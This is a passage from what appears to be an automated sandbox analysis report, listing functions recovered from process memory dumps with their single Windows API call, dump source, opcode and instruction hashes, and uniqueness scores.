                                                                                            • Opcode Fuzzy Hash: 42f5aae2963efaec90c328f5db09e6bba4b65cc3213aa12a958a511b7901e882
                                                                                            • Instruction Fuzzy Hash: 8B115C71604200EFFB209F15DC85BA6BBA8EF04760F14846AED05DA291D664A9048B61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 576ab28fdd4b44df9004b83aac2c224adf03de1e1a6425b4cffbdc3457e2a283
                                                                                            • Instruction ID: e877f15e1aa810d0dae0bf82878e73f4d8b5a5fb63e815889ba64e3c74f191b6
                                                                                            • Opcode Fuzzy Hash: 576ab28fdd4b44df9004b83aac2c224adf03de1e1a6425b4cffbdc3457e2a283
                                                                                            • Instruction Fuzzy Hash: E3219F725083809FEB21CF25DC45B96FFF4EF06220F0884AEED898B562D235A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 1b078fdbb71ac3f823e108403c56b9589e5842902cf2bbf546a538a678b7a000
                                                                                            • Instruction ID: dfa3159bf67a3e46c2b68b3b7ce9b8daca91b849173106c6185aff524fc15bcb
                                                                                            • Opcode Fuzzy Hash: 1b078fdbb71ac3f823e108403c56b9589e5842902cf2bbf546a538a678b7a000
                                                                                            • Instruction Fuzzy Hash: 56216D7150D3C09FDB12CB25DC55B92BFB4AF13224F0D84DAE888CF293D2659808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0058BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: ba046f2d121a1a96d79a4e4c95480a21cda4fa92d876fcf6abf5353873caf6be
                                                                                            • Instruction ID: 896b3fb1b5074a2d2447259b94587142c930a9ca14c89caf97eb76ba6378d8bf
                                                                                            • Opcode Fuzzy Hash: ba046f2d121a1a96d79a4e4c95480a21cda4fa92d876fcf6abf5353873caf6be
                                                                                            • Instruction Fuzzy Hash: D42181765093C09FEB128F25DC55A92BFE4EF07320F0984DBDD858F263D264A948DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0058AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 4353d3063cd96b2943d51638a8757f0c8163af988ef7918262396b9afb02e66c
                                                                                            • Instruction ID: 413e464a55f351140e0300935c6dc41653abb40571676f0e6aa699a696e94a29
                                                                                            • Opcode Fuzzy Hash: 4353d3063cd96b2943d51638a8757f0c8163af988ef7918262396b9afb02e66c
                                                                                            • Instruction Fuzzy Hash: 072172B16053809FEB21CF25DC44B52BFE8EF56211F0884ABED49DB252D265E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 3bcf7eb1353146271f7ffc0127bd287844a6319e3f5e20daddf89623918da3b4
                                                                                            • Instruction ID: a171c89ead29893d267b2cb8802dace5fbf018a8732f438b8123eb53e85ae98a
                                                                                            • Opcode Fuzzy Hash: 3bcf7eb1353146271f7ffc0127bd287844a6319e3f5e20daddf89623918da3b4
                                                                                            • Instruction Fuzzy Hash: EC216D6140D3C49FEB138B25DC54A62BFB4EF57624F0980DBD8848F2A3D6695808D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 0058AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: de462188cff23fa2250dfe8886fc8e400f44bf2669ff2f727c233d703819e5a9
                                                                                            • Instruction ID: 32836b02f0414cea236c669060cafeecb006c2f8caa7a2bb54bfaedd01a6e8dd
                                                                                            • Opcode Fuzzy Hash: de462188cff23fa2250dfe8886fc8e400f44bf2669ff2f727c233d703819e5a9
                                                                                            • Instruction Fuzzy Hash: 2211C172500300EFFB21EF55DC85BA7FBA8EF44720F14846AED09DA281D670A904CBB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0058BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 035b4d21cf055c78e8107967be4ed7ce66ba926ed8522a80b6f7bdf4a6889183
                                                                                            • Instruction ID: 9baf81d2dbbfcd6553a9c1d8fa2d4aa98efd171a0e06b99cb54c37ffa44b4f1b
                                                                                            • Opcode Fuzzy Hash: 035b4d21cf055c78e8107967be4ed7ce66ba926ed8522a80b6f7bdf4a6889183
                                                                                            • Instruction Fuzzy Hash: BD118E71508380AFEB21CF65CC44A52FFF4EF05210F08849AE9859B662D375E418CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 027708E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: eaa3fead72346dd89f55d50a949a22717d38745eb39fe2250b30e37dd4906c98
                                                                                            • Instruction ID: 0e3e786d0d0172c86de2e906dd6d5a37ca48cc7d98a923854abc53e5d05c4941
                                                                                            • Opcode Fuzzy Hash: eaa3fead72346dd89f55d50a949a22717d38745eb39fe2250b30e37dd4906c98
                                                                                            • Instruction Fuzzy Hash: 4511CE72400300EFFB21DF51DC85FA6FBE8EF14720F14856AED499A241D671A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0058A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 02f5ececc311137da29f6a979be756913eaee61c1dfca14ee981e75da1da93fd
                                                                                            • Instruction ID: 315a70694294c88023db05ca6090aad43fea543607f62d82c9ee50dbb1820dc2
                                                                                            • Opcode Fuzzy Hash: 02f5ececc311137da29f6a979be756913eaee61c1dfca14ee981e75da1da93fd
                                                                                            • Instruction Fuzzy Hash: B3118F714093C09FEB128B15DC54A62BFB4EF47614F1884CBEDC48F263D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: aa61a07d89c94ec63704387a0c139a3ade7bdccb0f7ab2912ccb7bb9a4cd9705
                                                                                            • Instruction ID: 113f93a202137b52f6c87a830a5510c12cde9d893d0e86b9d82ad670b5379c07
                                                                                            • Opcode Fuzzy Hash: aa61a07d89c94ec63704387a0c139a3ade7bdccb0f7ab2912ccb7bb9a4cd9705
                                                                                            • Instruction Fuzzy Hash: C01191715093849FDB118F25DC45B96FFE4EF06220F0984EEED498B262D275A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 09254a841a2a7d0327b303167fcb5ae4eba63b9665ca1ad45b719814d9446251
                                                                                            • Instruction ID: 1cafb59dac58073e295991f57018cde261e159a0dea69a2c63ceab58ce0b3f78
                                                                                            • Opcode Fuzzy Hash: 09254a841a2a7d0327b303167fcb5ae4eba63b9665ca1ad45b719814d9446251
                                                                                            • Instruction Fuzzy Hash: 8C11C2755093C09FDB128B15DC95B52FFB4DF42224F0880DBED858B6A3D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0058AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: f06a80acae35ebb43c40d454a8f870a4a45558b1b0bf6b8525b7eb5be2e451ef
                                                                                            • Instruction ID: 7508a50859ca5f5b706a74ce67a893122c28dc77d0c558dc42965ee8f11f39be
                                                                                            • Opcode Fuzzy Hash: f06a80acae35ebb43c40d454a8f870a4a45558b1b0bf6b8525b7eb5be2e451ef
                                                                                            • Instruction Fuzzy Hash: 3B115EB16007409FEB20EF29DC85B56FFD8EB14721F18846ADD09DB642E674E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0058AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 251583463aac408046dd4cf7ece40e14889cc0812a31c776f97867114046f205
                                                                                            • Instruction ID: 4a0bcaf379c47a61a72bca121bf64ffe5ca227ddf2a7f87259bf78c363d437fd
                                                                                            • Opcode Fuzzy Hash: 251583463aac408046dd4cf7ece40e14889cc0812a31c776f97867114046f205
                                                                                            • Instruction Fuzzy Hash: 7511917540D7C09FEB128B15DC85A91BFA4EF13324F0980DBDD858F1A3D269A909D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: bb59127b94645af8d04f3cac7e2dae24a89896eb9e5fcb749c1e1c13e02d69d1
                                                                                            • Instruction ID: 558db1d14184deb3df501d2954804f421dd523f16e17b2fc4a9772c211980591
                                                                                            • Opcode Fuzzy Hash: bb59127b94645af8d04f3cac7e2dae24a89896eb9e5fcb749c1e1c13e02d69d1
                                                                                            • Instruction Fuzzy Hash: 1311BF714093C09FEB12CB25DC55B92FFB4EF07324F0980DADD848B263D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 02770819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 83c605cdb9a1eaeb1795f6605da02e6eedc16c895845b9bb13e41113a48a932c
                                                                                            • Instruction ID: cdd7e91cc0df76fd945fd09c045c922425f510d2ce895e99f3106a131c3f3a0f
                                                                                            • Opcode Fuzzy Hash: 83c605cdb9a1eaeb1795f6605da02e6eedc16c895845b9bb13e41113a48a932c
                                                                                            • Instruction Fuzzy Hash: 5B018C71500744EFFB209F15DC86BA6FB98DF44720F1484AAFD099A282D674A904CAA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: fe0d6f0240c3409736622720db6b75460073acd1beaa6ebd83102e93ea61e6bd
                                                                                            • Instruction ID: ad297939272aa8b213bab1465f80c9aae9c50e4145d2b3cb38ef81d9d543c1a1
                                                                                            • Opcode Fuzzy Hash: fe0d6f0240c3409736622720db6b75460073acd1beaa6ebd83102e93ea61e6bd
                                                                                            • Instruction Fuzzy Hash: A1118776600700DFEF20DF56DC85B66FBA4EF04620F0884AAED4A8B652D771E418CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0058ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: f960b06e660f04b3eda4780f98026a4a8591defdb1b3af69970f7c3c9b377c4a
                                                                                            • Instruction ID: 7edabb8f0d893775aea46e67a19806eaf6107e30ce6d397d3615bc6a99260f27
                                                                                            • Opcode Fuzzy Hash: f960b06e660f04b3eda4780f98026a4a8591defdb1b3af69970f7c3c9b377c4a
                                                                                            • Instruction Fuzzy Hash: 8D1182B55097809FEB11CF55DC85B92BFA4EF52324F0980ABDD488F153D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0058BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 4d448cee71bd7e4f5126d4fc657679d956c72feb1842c1cb6d3755ef38c94a31
                                                                                            • Instruction ID: 441567c87cb1fb2cf0e30f16a28cd02efc6d3ab115afa703bfdba862139c8a40
                                                                                            • Opcode Fuzzy Hash: 4d448cee71bd7e4f5126d4fc657679d956c72feb1842c1cb6d3755ef38c94a31
                                                                                            • Instruction Fuzzy Hash: 12117972504700DFEB20DF55D884B62FFE8FF18320F1888AAED899A622D371E414DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0058A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 2d08710b7ee5dc61dd9f7028bb5f4c82abfc87e581df15730e91186feb9407fb
                                                                                            • Instruction ID: cc1fb8bac5a81654ef9d6f3f99db7b6a79409401b0e8e70fe15df9e4015bb92d
                                                                                            • Opcode Fuzzy Hash: 2d08710b7ee5dc61dd9f7028bb5f4c82abfc87e581df15730e91186feb9407fb
                                                                                            • Instruction Fuzzy Hash: 0B018471900600AFE710DF16DC46B66FBE8FB84A20F24816AED089B741D635F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 8c97ef40b50ad4d36a92ce1fa04616bcf13fc87f0c839d959bbfd6c6b2b645ac
                                                                                            • Instruction ID: 50727ee29fc6e93d4b967e8897260d13945b9c1cece5b01fa63941cb120014cc
                                                                                            • Opcode Fuzzy Hash: 8c97ef40b50ad4d36a92ce1fa04616bcf13fc87f0c839d959bbfd6c6b2b645ac
                                                                                            • Instruction Fuzzy Hash: 15017171900600ABE710DF16DC46B66FBA8FB84A20F24816AED089B741D635F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 0138974bf2aa1c633276dd4c6f83579d49dde9db7fcd7bc1eba716f4d7624838
                                                                                            • Instruction ID: 1f7da9b3567a2dd19420301c9ad9516342a0fe89e5806ebd6721690e173d6fd8
                                                                                            • Opcode Fuzzy Hash: 0138974bf2aa1c633276dd4c6f83579d49dde9db7fcd7bc1eba716f4d7624838
                                                                                            • Instruction Fuzzy Hash: 28015A726047449FEF10DF6ADC857AAFBA8EB11625F1884AADC09CB642E674E404CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0058BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: f7f9bb676e24132bd35a0b96f9a9565126283e89107d6698ad4c96fe334d79d3
                                                                                            • Instruction ID: 181328b7c4735b33056cf03fd9c65d786398a23c96c25ee38037cdfda61434e9
                                                                                            • Opcode Fuzzy Hash: f7f9bb676e24132bd35a0b96f9a9565126283e89107d6698ad4c96fe334d79d3
                                                                                            • Instruction Fuzzy Hash: 7B01BC71500240DFEB209F15DC857A6FFA8EF05721F18C4AADD499B256D775E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: bc1da4d32f2186def108bd399de16778f1a326412121b495b005afbb37fe3900
                                                                                            • Instruction ID: a8b284a91e39327481fcd0c2a69b46f42df2db28a293946953d462d5fd0866dd
                                                                                            • Opcode Fuzzy Hash: bc1da4d32f2186def108bd399de16778f1a326412121b495b005afbb37fe3900
                                                                                            • Instruction Fuzzy Hash: BD01B871904340DFEF209F19DC85BAAFBA4EF04620F48C4AADC098BA52D675A404CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0058A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: b31d366e461925948957c83e0e7a2578970c9c708d81588c32efc1e7e3ba12b7
                                                                                            • Instruction ID: 758a2cd3ec5a500b195f948a0df2a3a988c2451207f1eb56d311911e688cdc90
                                                                                            • Opcode Fuzzy Hash: b31d366e461925948957c83e0e7a2578970c9c708d81588c32efc1e7e3ba12b7
                                                                                            • Instruction Fuzzy Hash: 1C016271900600ABE310DF16DC46B26FBA4FB88B20F24815AED089B741D675F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 32662d7460fbb532f6c4e6bad92ffd01793b8b22753ee28f9d0cdd2ea215d2c7
                                                                                            • Instruction ID: fec0a44b939b6eb3f7e2edd51f9b80225a9b0a980d0a9a32804b4de2aabf853e
                                                                                            • Opcode Fuzzy Hash: 32662d7460fbb532f6c4e6bad92ffd01793b8b22753ee28f9d0cdd2ea215d2c7
                                                                                            • Instruction Fuzzy Hash: 5D017871904340DFEF20DF19D885B66FBA4EB02624F1884AADC08CF246E774E408CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 13add3512a9775d5d4b25f53a6433c3c871a94b365d11a0161058c6cee98730b
                                                                                            • Instruction ID: f7964fad18dbdefd5899ef0a796f9019cc8225b0894bf8e54c2e2ae2e99543af
                                                                                            • Opcode Fuzzy Hash: 13add3512a9775d5d4b25f53a6433c3c871a94b365d11a0161058c6cee98730b
                                                                                            • Instruction Fuzzy Hash: 8C016271900600ABE310DF16DC46B26FBA4FB88B20F24815AED089B741D675F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: caf29cd243f1b0237c8257840d8f0144762d9b9fd1b1b9b086d3f34a35ad3ec5
                                                                                            • Instruction ID: c5f5c847f5984ebd52c472a658fe9e613c6313eb58ced2e4151a0ff740fcd0f3
                                                                                            • Opcode Fuzzy Hash: caf29cd243f1b0237c8257840d8f0144762d9b9fd1b1b9b086d3f34a35ad3ec5
                                                                                            • Instruction Fuzzy Hash: 5B01FF75600740CFEF208F19D889762FBA0EF41624F08C0AADC09CB752D674E808CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0058ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 45aa713a8217bbb6b85873a22c0cc84b9be0db0dcec7918233aa59043e86146a
                                                                                            • Instruction ID: b6fac83da5686e704ffdb957ddb750cea49e3d9d91575300eb91a7832a0f1ff3
                                                                                            • Opcode Fuzzy Hash: 45aa713a8217bbb6b85873a22c0cc84b9be0db0dcec7918233aa59043e86146a
                                                                                            • Instruction Fuzzy Hash: 1001A971404640CFEB10EF19D889BA1FFA4EB10221F18C4ABDD089B242D678A804CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

